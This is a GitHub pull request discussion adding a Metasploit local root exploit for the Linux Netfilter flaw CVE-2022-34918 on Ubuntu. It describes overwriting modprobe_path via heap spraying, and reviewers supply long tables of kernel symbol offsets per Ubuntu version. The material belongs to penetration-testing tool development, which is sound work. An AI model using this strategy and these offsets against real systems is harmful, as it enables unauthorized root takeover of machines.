Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add exploit for CVE-2022-34918 #16794

Merged
merged 12 commits into from
Sep 27, 2022

Conversation

red0xff
Copy link
Contributor

@red0xff red0xff commented Jul 20, 2022

CVE-2022-34918

This is a local-privilege escalation exploit targeting the Netfilter component of the Linux kernel.

CVE details
RandoriSec blog post

The vulnerability was discovered, and the initial exploit code was written by Arthur Mongodin (@Aleknight) during his internship at RandoriSec, I made a few modifications to the PoC code, and made a metasploit module out of it.

The exploit targets Ubuntu, it aims to overwrite the modprobe_path variable with a string in /tmp/, to create a corresponding temporary file that gives the setuid bit to our payload.

From my testing, it has a pretty good success rate, but the system is not always in a stable state after successful exploitation (kernel panics can occur randomly at any time).

Credits

Thanks to @randorisec for supporting this research, and the publication of this exploit code.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Run Ubuntu (Desktop or Server), running a kernel that has offsets in external/source/exploits/CVE-2022-34918/src/util.c, 5.15.0-25-generic #25-Ubuntu for example.
  • Get a session on the target
  • Test this module use exploit/linux/local/netfilter_nft_set_elem_init_privesc
  • Verify The privilege escalation works

Possible improvements

  • This exploit leaves a file in /tmp, having a non-printable name, the file is created by the exploit binary, not sure if it's a good idea to use register_file_for_cleanup for it.

  • Compiling on the target would be a good idea, but as I see, the Msf::Post::Linux::Compile mixin is mainly a wrapper over gcc. I think it would be a great idea to have a wrapper around make, support clang perhaps if there is no gcc on the target, and so on. I don't think wrapping the exploit in a single file would be a good idea.

  • The exploit writes a file to /tmp anyway, WritableDir is used for uploading the payload and the exploit, but the exploitation strategy used overwrites bytes from modprobe_path with a valid pointer that is also a filename in /tmp.

  • A check method? Not sure if check should return whether the vulnerability is present, or whether the target is supported (The vulnerability is not specific to Ubuntu, but the exploitation strategy might differ, and the exploit doesn't even have all the offsets for Ubuntu kernel versions).

  • More offsets for more Ubuntu kernel versions would be nice (update external/source/exploits/CVE-2022-34918/src/util.c). The needed offsets are those of:

    • io_ring_ctx_ref_free
    • io_rsrc_node_ref_zero
    • modprobe_path

Testing tips

  • To speed-up the exploit upload, you can remove the -static flag in the Makefile (this will reduce the file size drastically).
  • If it fails a few times, reboot and retry (it relies on heap spraying).
  • On successful exploitation, you get a root shell.

lpe_successful

@github-actions
Copy link

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@bcoles
Copy link
Contributor

bcoles commented Jul 20, 2022

A check method? Not sure if check should return whether the vulnerability is present, or whether the target is supported (The vulnerability is not specific to Ubuntu, but the exploitation strategy might differ, and the exploit doesn't even have all the offsets for Ubuntu kernel versions).

CheckCode::Appears is appropriate if the target system is determined to be vulnerable to be exploitable using the existing exploit code.

Use CheckCode::Safe with an appropriate message if the target system is likely to be vulnerable, but not exploitable using the existing exploit code; ie, something like: CheckCode::Safe("Target kernel version #{version} appears vulnerable, but no offsets for this version).

See also: https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-write-a-check-method.html

Edit: A quick read through the source shows that at minimum the target kernel must be Ubuntu and unprivileged user namespaces are required. Refer to the following modules which check for these requirements, in addition to checking the kernel version.

@bcoles
Copy link
Contributor

bcoles commented Jul 20, 2022

Compiling on the target would be a good idea, but as I see, the Msf::Post::Linux::Compile mixin is mainly a wrapper over gcc. I think it would be a great idea to have a wrapper around make, support clang perhaps if there is no gcc on the target, and so on. I don't think wrapping the exploit in a single file would be a good idea.

You can write the upload and compile code manually. Before this method existed, the same code was copied between a bunch of modules. This method grew natively out of the copypasta. It isn't a rule.

Personally I usually prefer re-writing the exploit to be an all-in-one self-contained C file. This is more convenient and also means that the target host requires only gcc (no make). However, that is not always possible, and glancing at the 28 files in the PR it may not be viable here.

@bcoles
Copy link
Contributor

bcoles commented Jul 20, 2022

More offsets for more Ubuntu kernel versions would be nice (update external/source/exploits/CVE-2022-34918/src/util.c).

This should keep you entertained for a while. Looks like io_rsrc_node_ref_zero was not present before 5.13 Ubuntu kernels.

20.04.4 LTS

/boot/System.map-5.11.0-41-generic:ffffffff8137db60 t io_ring_ctx_ref_free
/boot/System.map-5.11.0-44-generic:ffffffff8137de70 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-25-generic:ffffffff81389270 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-27-generic:ffffffff81389280 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-30-generic:ffffffff81389740 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-35-generic:ffffffff81389740 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-37-generic:ffffffff81389ef0 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-39-generic:ffffffff81389ef0 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-41-generic:ffffffff8138a9a0 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-52-generic:ffffffff8138abf0 t io_ring_ctx_ref_free
/boot/System.map-5.4.0-26-generic:ffffffff81340560 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-40-generic:ffffffff81368370 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-41-generic:ffffffff81368370 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-43-generic:ffffffff81368370 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-44-generic:ffffffff81352080 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-45-generic:ffffffff81352400 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-48-generic:ffffffff813523b0 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-49-generic:ffffffff81353270 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-50-generic:ffffffff81353270 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-53-generic:ffffffff81353c20 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-25-generic:ffffffff81389a80 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-27-generic:ffffffff81389a90 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-30-generic:ffffffff81389f50 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-35-generic:ffffffff81389f50 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-37-generic:ffffffff8138a700 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-39-generic:ffffffff8138a700 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-41-generic:ffffffff8138b1b0 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-52-generic:ffffffff8138b400 t io_rsrc_node_ref_zero
/boot/System.map-5.11.0-41-generic:ffffffff82c6c2e0 D modprobe_path
/boot/System.map-5.11.0-44-generic:ffffffff82c6c2e0 D modprobe_path
/boot/System.map-5.13.0-25-generic:ffffffff82e6e0a0 D modprobe_path
/boot/System.map-5.13.0-27-generic:ffffffff82e6e0a0 D modprobe_path
/boot/System.map-5.13.0-30-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.13.0-35-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.13.0-37-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.13.0-39-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.13.0-41-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.13.0-52-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.4.0-26-generic:ffffffff8265f640 D modprobe_path
/boot/System.map-5.8.0-40-generic:ffffffff82663b80 D modprobe_path
/boot/System.map-5.8.0-41-generic:ffffffff82663b80 D modprobe_path
/boot/System.map-5.8.0-43-generic:ffffffff82663b80 D modprobe_path
/boot/System.map-5.8.0-44-generic:ffffffff82663bc0 D modprobe_path
/boot/System.map-5.8.0-45-generic:ffffffff82663bc0 D modprobe_path
/boot/System.map-5.8.0-48-generic:ffffffff82663bc0 D modprobe_path
/boot/System.map-5.8.0-49-generic:ffffffff82663bc0 D modprobe_path
/boot/System.map-5.8.0-50-generic:ffffffff82663bc0 D modprobe_path
/boot/System.map-5.8.0-53-generic:ffffffff82663bc0 D modprobe_path
/boot/vmlinuz-5.11.0-41-generic:5.11.0-41-generic (buildd@lgw01-amd64-005) #45~20.04.1-Ubuntu SMP Wed Nov 10 10:20:10 UTC 2021Binary file /boot/vmlinuz-5.11.0-41-generic matches
/boot/vmlinuz-5.11.0-44-generic:5.11.0-44-generic (buildd@lcy02-amd64-042) #48~20.04.2-Ubuntu SMP Tue Dec 14 15:36:44 UTC 2021Binary file /boot/vmlinuz-5.11.0-44-generic matches
/boot/vmlinuz-5.13.0-25-generic:5.13.0-25-generic (buildd@lcy02-amd64-029) #26~20.04.1-Ubuntu SMP Fri Jan 7 16:27:40 UTC 2022Binary file /boot/vmlinuz-5.13.0-25-generic matches
/boot/vmlinuz-5.13.0-27-generic:5.13.0-27-generic (buildd@lgw01-amd64-045) #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022Binary file /boot/vmlinuz-5.13.0-27-generic matches
/boot/vmlinuz-5.13.0-30-generic:5.13.0-30-generic (buildd@lcy02-amd64-003) #33~20.04.1-Ubuntu SMP Mon Feb 7 14:25:10 UTC 2022Binary file /boot/vmlinuz-5.13.0-30-generic matches
/boot/vmlinuz-5.13.0-35-generic:5.13.0-35-generic (buildd@ubuntu) #40~20.04.1-Ubuntu SMP Mon Mar 7 09:18:32 UTC 2022Binary file /boot/vmlinuz-5.13.0-35-generic matches
/boot/vmlinuz-5.13.0-37-generic:5.13.0-37-generic (buildd@lcy02-amd64-111) #42~20.04.1-Ubuntu SMP Tue Mar 15 15:44:28 UTC 2022Binary file /boot/vmlinuz-5.13.0-37-generic matches
/boot/vmlinuz-5.13.0-39-generic:5.13.0-39-generic (buildd@lcy02-amd64-080) #44~20.04.1-Ubuntu SMP Thu Mar 24 16:43:35 UTC 2022Binary file /boot/vmlinuz-5.13.0-39-generic matches
/boot/vmlinuz-5.13.0-41-generic:5.13.0-41-generic (buildd@lcy02-amd64-017) #46~20.04.1-Ubuntu SMP Wed Apr 20 13:16:21 UTC 2022Binary file /boot/vmlinuz-5.13.0-41-generic matches
/boot/vmlinuz-5.13.0-52-generic:5.13.0-52-generic (buildd@lcy02-amd64-067) #59~20.04.1-Ubuntu SMP Thu Jun 16 21:21:28 UTC 2022Binary file /boot/vmlinuz-5.13.0-52-generic matches
/boot/vmlinuz-5.4.0-26-generic:5.4.0-26-generic (buildd@lcy01-amd64-029) #30-Ubuntu SMP Mon Apr 20 16:58:30 UTC 2020Binary file /boot/vmlinuz-5.4.0-26-generic matches
/boot/vmlinuz-5.8.0-40-generic:5.8.0-40-generic (buildd@lcy01-amd64-014) #45~20.04.1-Ubuntu SMP Fri Jan 15 11:35:04 UTC 2021Binary file /boot/vmlinuz-5.8.0-40-generic matches
/boot/vmlinuz-5.8.0-41-generic:5.8.0-41-generic (buildd@lgw01-amd64-003) #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021Binary file /boot/vmlinuz-5.8.0-41-generic matches
/boot/vmlinuz-5.8.0-43-generic:5.8.0-43-generic (buildd@lcy01-amd64-018) #49~20.04.1-Ubuntu SMP Fri Feb 5 09:57:56 UTC 2021Binary file /boot/vmlinuz-5.8.0-43-generic matches
/boot/vmlinuz-5.8.0-44-generic:5.8.0-44-generic (buildd@lgw01-amd64-054) #50~20.04.1-Ubuntu SMP Wed Feb 10 21:07:30 UTC 2021Binary file /boot/vmlinuz-5.8.0-44-generic matches
/boot/vmlinuz-5.8.0-45-generic:5.8.0-45-generic (buildd@lcy01-amd64-024) #51~20.04.1-Ubuntu SMP Tue Feb 23 13:46:31 UTC 2021Binary file /boot/vmlinuz-5.8.0-45-generic matches
/boot/vmlinuz-5.8.0-48-generic:5.8.0-48-generic (buildd@lgw01-amd64-008) #54~20.04.1-Ubuntu SMP Sat Mar 20 13:40:25 UTC 2021Binary file /boot/vmlinuz-5.8.0-48-generic matches
/boot/vmlinuz-5.8.0-49-generic:5.8.0-49-generic (buildd@lgw01-amd64-055) #55~20.04.1-Ubuntu SMP Fri Mar 26 01:01:07 UTC 2021Binary file /boot/vmlinuz-5.8.0-49-generic matches
/boot/vmlinuz-5.8.0-50-generic:5.8.0-50-generic (buildd@lgw01-amd64-030) #56~20.04.1-Ubuntu SMP Mon Apr 12 21:46:35 UTC 2021Binary file /boot/vmlinuz-5.8.0-50-generic matches
/boot/vmlinuz-5.8.0-53-generic:5.8.0-53-generic (buildd@lcy01-amd64-012) #60~20.04.1-Ubuntu SMP Thu May 6 09:52:46 UTC 2021Binary file /boot/vmlinuz-5.8.0-53-generic matches

Ubuntu 21.10

/boot/System.map-5.13.0-27-generic:ffffffff81390b70 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-30-generic:ffffffff81390d80 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-35-generic:ffffffff81390d80 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-37-generic:ffffffff81391440 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-37-lowlatency:ffffffff8139a660 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-40-generic:ffffffff813919d0 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-27-generic:ffffffff81391470 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-30-generic:ffffffff81391680 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-35-generic:ffffffff81391680 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-37-generic:ffffffff81391d40 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-37-lowlatency:ffffffff8139af10 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-40-generic:ffffffff813922d0 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-27-generic:ffffffff82e6e0a0 D modprobe_path
/boot/System.map-5.13.0-30-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.13.0-35-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.13.0-37-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.13.0-37-lowlatency:ffffffff82e6f1a0 D modprobe_path
/boot/System.map-5.13.0-40-generic:ffffffff82e6e220 D modprobe_path
/boot/vmlinuz-5.13.0-27-generic:5.13.0-27-generic (buildd@lcy02-amd64-014) #29-Ubuntu SMP Wed Jan 12 17:36:47 UTC 2022grep: /boot/vmlinuz-5.13.0-27-generic: binary file matches
/boot/vmlinuz-5.13.0-30-generic:5.13.0-30-generic (buildd@lcy02-amd64-032) #33-Ubuntu SMP Fri Feb 4 17:03:31 UTC 2022grep: /boot/vmlinuz-5.13.0-30-generic: binary file matches
/boot/vmlinuz-5.13.0-35-generic:5.13.0-35-generic (buildd@ubuntu) #40-Ubuntu SMP Mon Mar 7 08:03:10 UTC 2022grep: /boot/vmlinuz-5.13.0-35-generic: binary file matches
/boot/vmlinuz-5.13.0-37-generic:5.13.0-37-generic (buildd@lcy02-amd64-012) #42-Ubuntu SMP Tue Mar 15 14:34:06 UTC 2022grep: /boot/vmlinuz-5.13.0-37-generic: binary file matches
/boot/vmlinuz-5.13.0-37-lowlatency:5.13.0-37-lowlatency (buildd@lcy02-amd64-012) #42-Ubuntu SMP PREEMPT Tue Mar 15 15:24:39 UTC 2022grep: /boot/vmlinuz-5.13.0-37-lowlatency: binary file matches
/boot/vmlinuz-5.13.0-40-generic:5.13.0-40-generic (buildd@lcy02-amd64-069) #45-Ubuntu SMP Tue Mar 29 14:48:14 UTC 2022grep: /boot/vmlinuz-5.13.0-40-generic: binary file matches

@red0xff red0xff force-pushed the add_exploit_cve-2022-34918 branch from 3b64a40 to d9c1219 Compare July 20, 2022 23:17
@red0xff red0xff force-pushed the add_exploit_cve-2022-34918 branch from d9c1219 to 73db035 Compare July 20, 2022 23:22
@red0xff
Copy link
Contributor Author

red0xff commented Jul 20, 2022

I added 14 more kernel offsets, and tested a few of these versions, thanks @bcoles . Could you provide a similar list for 22.04 LTS (if you have one of course). Or instructions on how you compile so many vmlinuz files.

The symbol that isn't present on older kernel versions is used in the KASLR bypass process, I am not sure if a different pointer could end up in the leaked memory, I might investigate it this weekend. Should still work with the io_ring_ctx_ref_free offset only, but I expect a lower success rate.

Added a check method also.

I will add the module docs tomorrow.

@bcoles
Copy link
Contributor

bcoles commented Jul 21, 2022

Could you provide a similar list for 22.04 LTS (if you have one of course). Or instructions on how you compile so many vmlinuz files.

Ubuntu 22.04 LTS

/boot/System.map-5.15.0-24-lowlatency:ffffffff813e68a0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-25-generic:ffffffff813dda20 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-27-generic:ffffffff813ddaf0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-27-lowlatency:ffffffff813e6970 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-30-generic:ffffffff813dea40 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-30-lowlatency:ffffffff813e78b0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-33-generic:ffffffff813dea40 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-33-lowlatency:ffffffff813e78c0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-35-generic:ffffffff813dfa00 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-35-lowlatency:ffffffff813e88d0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-37-generic:ffffffff813dfa00 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-37-lowlatency:ffffffff813e88d0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-39-generic:ffffffff813dfa00 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-39-lowlatency:ffffffff813e88d0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-40-generic:ffffffff813dfa00 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-40-lowlatency:ffffffff813e88d0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-41-generic:ffffffff813e00a0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-41-lowlatency:ffffffff813e8f70 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-24-lowlatency:ffffffff813e7690 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-24-lowlatency:ffffffff81cd8f9b t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-25-generic:ffffffff813de520 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-25-generic:ffffffff81cc586c t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-27-generic:ffffffff813de5f0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-27-generic:ffffffff81cc58c8 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-27-lowlatency:ffffffff813e7760 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-27-lowlatency:ffffffff81cd8ff7 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-30-generic:ffffffff813df540 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-30-generic:ffffffff81cc6274 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-30-lowlatency:ffffffff813e86a0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-30-lowlatency:ffffffff81cd99a3 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-33-generic:ffffffff813df540 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-33-generic:ffffffff81cc6274 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-33-lowlatency:ffffffff813e86b0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-33-lowlatency:ffffffff81cd99a3 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-35-generic:ffffffff813e04f0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-35-generic:ffffffff81cca3b2 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-35-lowlatency:ffffffff813e96b0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-35-lowlatency:ffffffff81cdda6a t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-37-generic:ffffffff813e04f0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-37-generic:ffffffff81cca3b2 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-37-lowlatency:ffffffff813e96b0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-37-lowlatency:ffffffff81cdda6a t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-39-generic:ffffffff813e04f0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-39-generic:ffffffff81cca3e1 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-39-lowlatency:ffffffff813e96b0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-39-lowlatency:ffffffff81cdda99 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-40-generic:ffffffff813e04f0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-40-generic:ffffffff81cca3e1 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-40-lowlatency:ffffffff813e96b0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-40-lowlatency:ffffffff81cdda99 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-41-generic:ffffffff813e0b90 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-41-generic:ffffffff81ccb440 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-41-lowlatency:ffffffff813e9d50 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-41-lowlatency:ffffffff81cdeaf8 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-24-lowlatency:ffffffff82e8c320 D modprobe_path
/boot/System.map-5.15.0-25-generic:ffffffff82e8b3a0 D modprobe_path
/boot/System.map-5.15.0-27-generic:ffffffff82e8b320 D modprobe_path
/boot/System.map-5.15.0-27-lowlatency:ffffffff82e8c2a0 D modprobe_path
/boot/System.map-5.15.0-30-generic:ffffffff82e8b460 D modprobe_path
/boot/System.map-5.15.0-30-lowlatency:ffffffff82e8c3e0 D modprobe_path
/boot/System.map-5.15.0-33-generic:ffffffff82e8b460 D modprobe_path
/boot/System.map-5.15.0-33-lowlatency:ffffffff82e8c3e0 D modprobe_path
/boot/System.map-5.15.0-35-generic:ffffffff82e8b560 D modprobe_path
/boot/System.map-5.15.0-35-lowlatency:ffffffff82e8c4e0 D modprobe_path
/boot/System.map-5.15.0-37-generic:ffffffff82e8b560 D modprobe_path
/boot/System.map-5.15.0-37-lowlatency:ffffffff82e8c4e0 D modprobe_path
/boot/System.map-5.15.0-39-generic:ffffffff82e8b620 D modprobe_path
/boot/System.map-5.15.0-39-lowlatency:ffffffff82e8c5a0 D modprobe_path
/boot/System.map-5.15.0-40-generic:ffffffff82e8b620 D modprobe_path
/boot/System.map-5.15.0-40-lowlatency:ffffffff82e8c5a0 D modprobe_path
/boot/System.map-5.15.0-41-generic:ffffffff82e8b660 D modprobe_path
/boot/System.map-5.15.0-41-lowlatency:ffffffff82e8c5e0 D modprobe_path
/boot/vmlinuz-5.15.0-24-lowlatency:5.15.0-24-lowlatency (buildd@lcy02-amd64-007) #24-Ubuntu SMP PREEMPT Thu Mar 31 10:02:54 UTC 2022grep: /boot/vmlinuz-5.15.0-24-lowlatency: binary file matches
/boot/vmlinuz-5.15.0-25-generic:5.15.0-25-generic (buildd@ubuntu) #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022grep: /boot/vmlinuz-5.15.0-25-generic: binary file matches
/boot/vmlinuz-5.15.0-27-generic:5.15.0-27-generic (buildd@ubuntu) #28-Ubuntu SMP Thu Apr 14 04:55:28 UTC 2022grep: /boot/vmlinuz-5.15.0-27-generic: binary file matches
/boot/vmlinuz-5.15.0-27-lowlatency:5.15.0-27-lowlatency (buildd@lcy02-amd64-019) #28-Ubuntu SMP PREEMPT Tue Apr 19 15:27:08 UTC 2022grep: /boot/vmlinuz-5.15.0-27-lowlatency: binary file matches
/boot/vmlinuz-5.15.0-30-generic:5.15.0-30-generic (buildd@lgw01-amd64-058) #31-Ubuntu SMP Thu May 5 10:00:34 UTC 2022grep: /boot/vmlinuz-5.15.0-30-generic: binary file matches
/boot/vmlinuz-5.15.0-30-lowlatency:5.15.0-30-lowlatency (buildd@lgw01-amd64-030) #31-Ubuntu SMP PREEMPT Thu May 5 12:24:00 UTC 2022grep: /boot/vmlinuz-5.15.0-30-lowlatency: binary file matches
/boot/vmlinuz-5.15.0-33-generic:5.15.0-33-generic (buildd@lcy02-amd64-037) #34-Ubuntu SMP Wed May 18 13:34:26 UTC 2022grep: /boot/vmlinuz-5.15.0-33-generic: binary file matches
/boot/vmlinuz-5.15.0-33-lowlatency:5.15.0-33-lowlatency (buildd@lcy02-amd64-032) #34-Ubuntu SMP PREEMPT Wed May 18 15:38:29 UTC 2022grep: /boot/vmlinuz-5.15.0-33-lowlatency: binary file matches
/boot/vmlinuz-5.15.0-35-generic:5.15.0-35-generic (buildd@lcy02-amd64-029) #36-Ubuntu SMP Sat May 21 02:24:07 UTC 2022grep: /boot/vmlinuz-5.15.0-35-generic: binary file matches
/boot/vmlinuz-5.15.0-35-lowlatency:5.15.0-35-lowlatency (buildd@lcy02-amd64-055) #36-Ubuntu SMP PREEMPT Mon May 23 15:33:44 UTC 2022grep: /boot/vmlinuz-5.15.0-35-lowlatency: binary file matches
/boot/vmlinuz-5.15.0-37-generic:5.15.0-37-generic (buildd@lcy02-amd64-031) #39-Ubuntu SMP Wed Jun 1 19:16:45 UTC 2022grep: /boot/vmlinuz-5.15.0-37-generic: binary file matches
/boot/vmlinuz-5.15.0-37-lowlatency:5.15.0-37-lowlatency (buildd@lcy02-amd64-018) #39-Ubuntu SMP PREEMPT Thu Jun 2 17:44:08 UTC 2022grep: /boot/vmlinuz-5.15.0-37-lowlatency: binary file matches
/boot/vmlinuz-5.15.0-39-generic:5.15.0-39-generic (buildd@lcy02-amd64-069) #42-Ubuntu SMP Thu Jun 9 23:42:32 UTC 2022grep: /boot/vmlinuz-5.15.0-39-generic: binary file matches
/boot/vmlinuz-5.15.0-39-lowlatency:5.15.0-39-lowlatency (buildd@lcy02-amd64-108) #42-Ubuntu SMP PREEMPT Fri Jun 10 12:00:27 UTC 2022grep: /boot/vmlinuz-5.15.0-39-lowlatency: binary file matches
/boot/vmlinuz-5.15.0-40-generic:5.15.0-40-generic (buildd@lcy02-amd64-047) #43-Ubuntu SMP Wed Jun 15 12:54:21 UTC 2022grep: /boot/vmlinuz-5.15.0-40-generic: binary file matches
/boot/vmlinuz-5.15.0-40-lowlatency:5.15.0-40-lowlatency (buildd@lcy02-amd64-072) #43-Ubuntu SMP PREEMPT Thu Jun 16 17:07:13 UTC 2022grep: /boot/vmlinuz-5.15.0-40-lowlatency: binary file matches
/boot/vmlinuz-5.15.0-41-generic:5.15.0-41-generic (buildd@lcy02-amd64-065) #44-Ubuntu SMP Wed Jun 22 14:20:53 UTC 2022grep: /boot/vmlinuz-5.15.0-41-generic: binary file matches
/boot/vmlinuz-5.15.0-41-lowlatency:5.15.0-41-lowlatency (buildd@lcy02-amd64-032) #44-Ubuntu SMP PREEMPT Wed Jun 22 15:40:35 UTC 2022grep: /boot/vmlinuz-5.15.0-41-lowlatency: binary file matches

@red0xff
Copy link
Contributor Author

red0xff commented Jul 22, 2022

I added some docs, updated the check method, and added offsets for Ubuntu 22.04 kernels, thanks to @bcoles . I also tested a few kernel versions, seems to work fine, but more testing is necessary.

Co-authored-by: bcoles <bcoles@gmail.com>
@bcoles bcoles added docs and removed needs-docs labels Jul 23, 2022
@red0xff red0xff force-pushed the add_exploit_cve-2022-34918 branch from ee9bc48 to 88d069a Compare July 24, 2022 23:09
@red0xff
Copy link
Contributor Author

red0xff commented Aug 6, 2022

@bwatters-r7 Any updates on this?

(Should be ready for landing, please let me know if you need help at testing, or if you have more feedback)


### Included Binaries
The binary used by this exploit `data/exploits/CVE-2022-34918/ubuntu.elf` can be used separately from
Metasploit. The binary takes a single argument which is the payload or executable you wish to launch as `root`.
Copy link
Contributor

@bwatters-r7 bwatters-r7 Aug 9, 2022

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I love that this has started to be a thing again!

external/source/exploits/CVE-2022-34918/src/main.c Outdated Show resolved Hide resolved
def run_payload
info = cmd_exec(@executable_path, @payload_path)
info.each_line do |line|
print_status(line.chomp)
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

minor, but this might be better as vprint_status because there's a lot of output in the c source. Another option might be to only print the output if the exploit fails. For an example, see

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Sometimes, the session is created, but a kernel panic follows shortly after. I've opted for vprint_status.

@bwatters-r7
Copy link
Contributor

@red0xff some minor stuff, but yup, this is on my radar again.

@bwatters-r7
Copy link
Contributor

Hey there @red0xff; thanks for addressing the changes! I'm in the middle of something else right now, but I'm hoping to take a look at this again next week.

@bwatters-r7
Copy link
Contributor

bwatters-r7 commented Aug 26, 2022

Also, I'm assuming this is based in large part on https://github.com/randorisec/CVE-2022-34918-LPE-PoC, which is owned by @randorisec. I don't see a license file or license information in any of the files; do we have permission to use the code? Could we work with @randorisec to add a license file that would allow us to use it?
I know that @Aleknight was the author, but if they did it while employed by @randorisec, my guess is that the code belongs to them, and the easiest thing would be to put a license file in the original repo that grants us (and/or anyone) permission to use it. Either a BSD-3 or MIT license would work, and I'm happy to work with the original repo owners to get it in place. I'll also tag @jmartin-r7 because while I know theoretically what needs to happen, he's actually done it.

@randorisec
Copy link

